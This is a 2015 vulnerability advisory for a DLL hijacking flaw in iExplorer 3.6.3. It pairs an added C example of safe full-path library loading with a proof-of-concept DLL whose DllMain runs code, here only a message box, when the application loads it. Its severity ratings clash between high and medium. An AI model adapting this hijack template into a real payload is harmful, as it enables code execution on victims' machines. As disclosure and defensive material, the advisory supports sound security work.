Document Title:
===============
iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll
Release Date:
=============
2015-07-30
Product & Service Introduction:
===============================
iExplorer lets you easily transfer music from any iPhone, iPod or iPad to a Mac or PC computer and iTunes. You can search for
and preview particular songs then copy them to iTunes with the touch of a button or with drag and drop. Looking to transfer
more than just a few tracks? With one click, iExplorer lets you instantly rebuild entire playlists or use the Auto Transfer
feature and copy everything from your device to iTunes.
Discovery Status:
=================
Published
Affected Product(s):
====================
Macroplant
Product: iExplorer 3.6.3.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
Macroplant iExplorer could allow a remote attacker to execute arbitrary code on the system. When running on Microsoft Windows, the application
does not specify the fully qualified path to a dynamic-link library (itunesmobiledevice.dll) that it loads. Windows then resolves the name
through its DLL search order, which can include the current working directory. By persuading a victim to open a specially crafted file from a
WebDAV or SMB share using the vulnerable application, a remote attacker could exploit this vulnerability via a specially crafted library to
execute arbitrary code on the system.
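The following added example, which is not part of the original advisory or Macroplant's code, shows the corrected loading pattern for the flaw described above: build a fully qualified path inside a trusted local directory and load the library only from that path. The helper names are hypothetical, and the caller is assumed to supply its own install directory as the trusted directory.

```c
/* Added example (hypothetical helper names), not the vendor's code. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Trusted directory must be a local drive path such as C:\Dir. UNC paths
 * (\\server\share, used for SMB and WebDAV) and relative paths are rejected.
 * A string check like this cannot detect mapped network drives. */
static int is_local_absolute_dir(const char *dir)
{
    return dir && isalpha((unsigned char)dir[0]) && dir[1] == ':' && dir[2] == '\\';
}

/* DLL name must be a bare file name ending in .dll: no separators, drive, or "..". */
static int is_bare_dll_name(const char *name)
{
    size_t n = name ? strlen(name) : 0;
    if (n < 5 || strpbrk(name, "\\/:") || strstr(name, ".."))
        return 0;
    const char *e = name + n - 4;
    return e[0] == '.' && tolower((unsigned char)e[1]) == 'd' &&
           tolower((unsigned char)e[2]) == 'l' && tolower((unsigned char)e[3]) == 'l';
}

/* Writes "<dir>\<name>" to out. Returns 0 on success, -1 if the input is rejected. */
int build_trusted_dll_path(const char *dir, const char *name,
                           char *out, size_t outlen)
{
    if (!is_local_absolute_dir(dir) || !is_bare_dll_name(name))
        return -1;
    const char *sep = dir[strlen(dir) - 1] == '\\' ? "" : "\\";
    int n = snprintf(out, outlen, "%s%s%s", dir, sep, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

#ifdef _WIN32
/* Loads by full path only; the current directory and PATH are not searched. */
HMODULE load_trusted_dll(const char *dir, const char *name)
{
    char path[MAX_PATH];
    if (build_trusted_dll_path(dir, name, path, sizeof path) != 0)
        return NULL;
    return LoadLibraryExA(path, NULL, LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR |
                                      LOAD_LIBRARY_SEARCH_SYSTEM32);
}
#endif
```

The path checks compile on any platform; the loader itself is built only on Windows, where the `LOAD_LIBRARY_SEARCH_*` flags restrict dependency lookup to the DLL's own directory and System32.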
Proof of Concept (PoC):
=======================
/*
 * Exploit Title: iExplorer 3.6.3.0 DLL Hijacking Exploit (itunesmobiledevice.dll)
 * Author: Tonel Team[Zeus_Syborg]
 * Vendor Homepage: http://www.macroplant.com/
 * Soft link: http://www.macroplant.com/downloads
 * Tested on: Windows 8.1Google chrome
 */
#include <windows.h>

/* Forward declaration so DllMain can call owned() before its definition. */
int owned(void);

BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* Runs when the host process loads this DLL. */
        owned();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* Marker only: shows a message box to prove the DLL was loaded. */
int owned(void)
{
    MessageBox(0, "iExplorer DLL HijackedZeus_Syborg", "POC", MB_OK);
    return 0;
}
Security Risk:
==============
The security risk of the local software vulnerability is estimated as medium. (CVSS 8.0)
Credits & Authors:
==================
Zeus_Syborg [Tonel Team]